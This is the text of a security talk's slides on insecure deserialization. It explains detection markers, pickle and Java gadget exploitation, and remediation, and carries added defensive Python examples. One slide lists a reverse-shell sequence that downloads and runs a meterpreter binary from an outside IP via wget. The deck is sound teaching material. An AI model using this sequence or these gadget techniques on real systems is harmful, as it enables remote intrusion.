![Page 1: How to be an App Serial Killer...DON'T BE SCARED!!! (or bored )-If you know nothing about this topic…-Hopefully you understand 25%-If you know a little about the topic…-50-75%-If](https://reader033.vdocuments.mx/reader033/viewer/2022041716/5e4b77df43ee9d29ae7a4b4f/html5/thumbnails/1.jpg)
How to be an App Serial Killer
Rebecca Deck
Avalara
@ranger_cha
DON'T BE SCARED!!! (or bored)
- If you know nothing about this topic…
  - Hopefully you understand 25%
- If you know a little about the topic…
  - 50-75%
- If you are really solid in your knowledge of the topic…
  - Learn one or two new things
Objective
- Deserialization Background
- Normal Deserialization
- Finding Deserialization Issues
- Deserialization Exploitation
Deserialization Background
https://me.me/i/confused-cat-meme-generator-imgflip-19c02328bba745a5b799c1b94446353d4
September 29, 2019
Serialization from the beginning…
What is an object?
Collection of values that works as a single unit
Serialization from the beginning…
Serialization is the process of turning an object into a byte stream so it can be sent over the network or stored
Also called marshalling
What does serialization look like?
Source: https://www.javaworld.com/article/2072752/the-java-serialization-algorithm-revealed.html
Deserialization
Deserialization is the reverse of serialization
Usually from a readObject call (in Java)
Common in many languages
An attacker can force the server to load an unexpected object
Often ends in arbitrary code execution
Transferring Data with Serialization
Server serializes -> Client deserializes
Client serializes -> Server deserializes
Server serializes -> writes data to disk/memcache -> Server deserializes
Malicious Objects
Source: https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
Deserialization Remediation
How do you fix it? Upgrade for…
Blacklisting???
Nooooo
Hard to write signatures
https://sayingimages.com/cat-meme/
Deserialization Remediation
Look-ahead Deserialization: overload resolveClass
Ensure that the object is of the correct class
JUST DON'T DO IT
Do something better like default JSON parsers
http://takomatorch.com/index.php/2019/07/13/takoma-park-police-adopt-new-enforcement-tactic-based-on-cat-discipline/
Finding Deserialization
September 28, 2019
White Box
Talk to developers
Look for deserialization calls
Java – readObject
Python – Pickle
.NET – TypeNameHandling, JavaScriptTypeResolver
Jackson – enableDefaultTyping, setSerializationInclusion, readValue
Black Box
Look for objects
Java – rO0, ACED0005, application/x-java-serialized-object
.NET – AAEAAAD/////, TypeObject, $type:
Python –
JSON – ["objtype",{"name": "value"}]
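The markers on this slide, and the earlier "what does serialization look like?" question, as a triage script. This is an added example, not code from the deck: `classify` tags a request body with every format marker it carries, and `pickle_code_opcodes` disassembles a pickle with `pickletools.genops` (which never resolves or calls anything) to show whether the stream names a callable. The pickle header check is my addition, since the slide leaves the Python line blank; the tag names are my own, and the sample bodies in `run_samples` are constructed, not captured traffic.

```python
import base64
import datetime
import json
import pickle
import pickletools

# Markers from the "Black Box" slide, plus the pickle header the slide leaves blank
# (pickle protocol 2 and later begins with the PROTO opcode 0x80 and a protocol byte).
JAVA_MAGIC = b"\xac\xed\x00\x05"          # raw Java ObjectOutputStream header (ACED0005)
JAVA_MAGIC_B64 = "rO0AB"                  # the same four bytes once base64-encoded
JAVA_CONTENT_TYPE = "application/x-java-serialized-object"
DOTNET_B64 = "AAEAAAD/////"               # base64 of the .NET BinaryFormatter header
PICKLE_PROTO = 0x80

# Opcodes that make a pickle resolve a module-level name and invoke it at load time.
PICKLE_CODE_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def typed_json_hint(text):
    """Return a tag if the JSON carries a class name the server will instantiate."""
    try:
        doc = json.loads(text)
    except ValueError:
        return None
    if isinstance(doc, dict) and "$type" in doc:
        return "dotnet-json-type-property"
    # Jackson default typing wraps a value as ["fully.qualified.Class", {...}]
    if (isinstance(doc, list) and len(doc) == 2 and isinstance(doc[0], str)
            and "." in doc[0] and isinstance(doc[1], dict)):
        return "jackson-default-typing-array"
    return None


def pickle_code_opcodes(data):
    """List the code-running opcodes in a pickle without executing it.
    pickletools.genops only disassembles the stream."""
    try:
        return sorted({op.name for op, _, _ in pickletools.genops(data)} & PICKLE_CODE_OPS)
    except Exception:  # truncated stream or not a pickle at all
        return []


def classify(body, content_type=""):
    """Tag a request body with every serialized-object format it appears to carry."""
    findings = []
    if JAVA_CONTENT_TYPE in content_type.lower():
        findings.append("java-content-type")
    if body.startswith(JAVA_MAGIC):
        findings.append("java-raw")
    if len(body) > 1 and body[0] == PICKLE_PROTO and 2 <= body[1] <= 5:
        findings.append("python-pickle")
        if pickle_code_opcodes(body):
            findings.append("python-pickle-calls-code")
    text = body.decode("utf-8", errors="replace")
    if JAVA_MAGIC_B64 in text:
        findings.append("java-base64")
    if DOTNET_B64 in text:
        findings.append("dotnet-binaryformatter-base64")
    hint = typed_json_hint(text)
    if hint:
        findings.append(hint)
    return findings


def run_samples():
    """Constructed request bodies (not real traffic), one per marker."""
    samples = {
        "plain_json": (b'{"user": "alice"}', "application/json"),
        "java_raw": (JAVA_MAGIC + b"\x73\x72", JAVA_CONTENT_TYPE),
        "java_b64": (base64.b64encode(JAVA_MAGIC + b"\x73\x72\x00"), "text/plain"),
        "dotnet_b64": (base64.b64encode(b"\x00\x01\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"),
                       "text/plain"),
        "dotnet_json": (b'{"$type": "Example.Type, Example", "Name": "x"}', "application/json"),
        "jackson_array": (b'["com.example.Widget", {"size": 3}]', "application/json"),
        # plain data: no opcode in the stream resolves or calls anything
        "pickle_data": (pickle.dumps({"user": "alice"}), "application/octet-stream"),
        # a date pickles through its reduce hook, so the stream names and calls datetime.date
        "pickle_reduce": (pickle.dumps(datetime.date(2019, 9, 28)), "application/octet-stream"),
    }
    return {name: classify(body, ctype) for name, (body, ctype) in samples.items()}


if __name__ == "__main__":
    for name, tags in run_samples().items():
        print(f"{name:14s} {tags}")
```

The base64 prefixes fall out of the raw headers: `base64.b64encode(b"\xac\xed\x00\x05")` is `rO0ABQ==`, which is why `rO0` shows up wherever a Java object is carried in a form field or cookie. A pickle that only contains data (`pickle_data`) never needs a `GLOBAL`/`STACK_GLOBAL` or `REDUCE` opcode, so their presence in an untrusted stream is worth alerting on before anything calls `pickle.loads`.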
Exploiting Deserialization
September 28, 2019
Pickle Deserialization
https://blog.nelhage.com/2011/03/exploiting-pickle/
Look for deserialization calls
Pickle Deserialization Exploit Class
Create a class that executes code when created
Pickle Send Exploit
Send exploit to server
How depends on the app
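An added Python example, not from the deck, that ties the exploit-class slide above to the look-ahead remediation slide earlier. `Gadget` has the shape the slide describes (a `__reduce__` hook that makes the loader call something the moment the object is built), but its callable is the harmless `record_call` rather than anything from `os`. `RestrictedUnpickler` overrides `find_class` the way the remediation slide says to overload `resolveClass`: it decides whether a class may be resolved before any object exists, allowing only the `Session` type this hypothetical application expects. All of these names are assumptions for the example.

```python
import io
import pickle

CALLS = []  # records each time the gadget's callable actually runs


def record_call(tag):
    """Harmless stand-in for the callable a real gadget would name (e.g. os.system)."""
    CALLS.append(tag)
    return tag


class Gadget:
    """Object whose pickle reduce hook makes the loader call record_call on load.
    Same shape as the exploit-class slide, with a harmless callable."""
    def __reduce__(self):
        return (record_call, ("gadget ran during load",))


class Session:
    """The one object type this hypothetical application legitimately accepts."""
    def __init__(self, user, role):
        self.user = user
        self.role = role


# Look-ahead allowlist: the only (module, name) pairs the loader may ever resolve.
ALLOWED = {(Session.__module__, Session.__qualname__)}


class RestrictedUnpickler(pickle.Unpickler):
    """Python analogue of overriding resolveClass: refuse before anything is built."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused to resolve {module}.{name}")


def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo():
    """Returns (legit object loaded, gadget ran under pickle.loads, gadget refused)."""
    legit = pickle.dumps(Session("alice", "viewer"))   # constructed, expected input
    hostile = pickle.dumps(Gadget())                    # constructed, unexpected input

    session = restricted_loads(legit)
    legit_ok = isinstance(session, Session) and session.user == "alice"

    CALLS.clear()
    pickle.loads(hostile)            # default loader: the named callable runs
    ran_by_default = CALLS == ["gadget ran during load"]

    CALLS.clear()
    try:
        restricted_loads(hostile)
        refused = False
    except pickle.UnpicklingError:
        refused = CALLS == []        # refused before anything executed
    return legit_ok, ran_by_default, refused


if __name__ == "__main__":
    print(demo())
```

The check happens in `find_class`, which the loader calls while it is still reading the stream, so the gadget's callable is never resolved, let alone invoked. This is the same reason the blacklisting slide says "Nooooo": an allowlist of the classes the application actually expects is short and stable, whereas a denylist has to keep up with every new gadget.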
Deserialization in Java
Look for raw Java objects
Find a suitable gadget (object to run code when loaded)
Must be an object the app understands
Ysoserial provides several gadgets: https://github.com/frohoff/ysoserial
Deserialization in Java
Vulnerable app https://github.com/hvqzao/java-deserialize-webapp
Includes Apache Commons Collection
Ysoserial exploit only runs one command
Reverse shell in three commands:
wget IP/meterpreter
chmod +x meterpreter
./meterpreter
Deserialization in Java Example
No Java Objects?
Safe without Java objects?
Moar gadgets: https://github.com/mbechler/marshalsec
Same idea, different format: JSON, XML
Jackson Deserialization
Summary
• Ysoserial and marshalsec for exploit gadgets
• Find by looking for common serialized object magic numbers or deserialization routines in code
• Often “Fix” Deserialization by blacklisting classes (need patch)
• Better off rewriting the data serialization method
• Use safer (less full-featured) libraries
References
Look-ahead Java Deserialization
https://www.ibm.com/developerworks/java/library/se-lookahead/index.html
Deserialization Resources
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md
Marshalling Pickles
http://frohoff.github.io/appseccali-marshalling-pickles/
ysoserial
https://github.com/frohoff/ysoserial
Deserialization – Different marshallers
https://github.com/mbechler/marshalsec
Pickle Deserialization
https://blog.nelhage.com/2011/03/exploiting-pickle/
Java Deserialization app
https://github.com/hvqzao/java-deserialize-webapp
Jackson Deserialization
https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/
Questions?
www.directdefense.com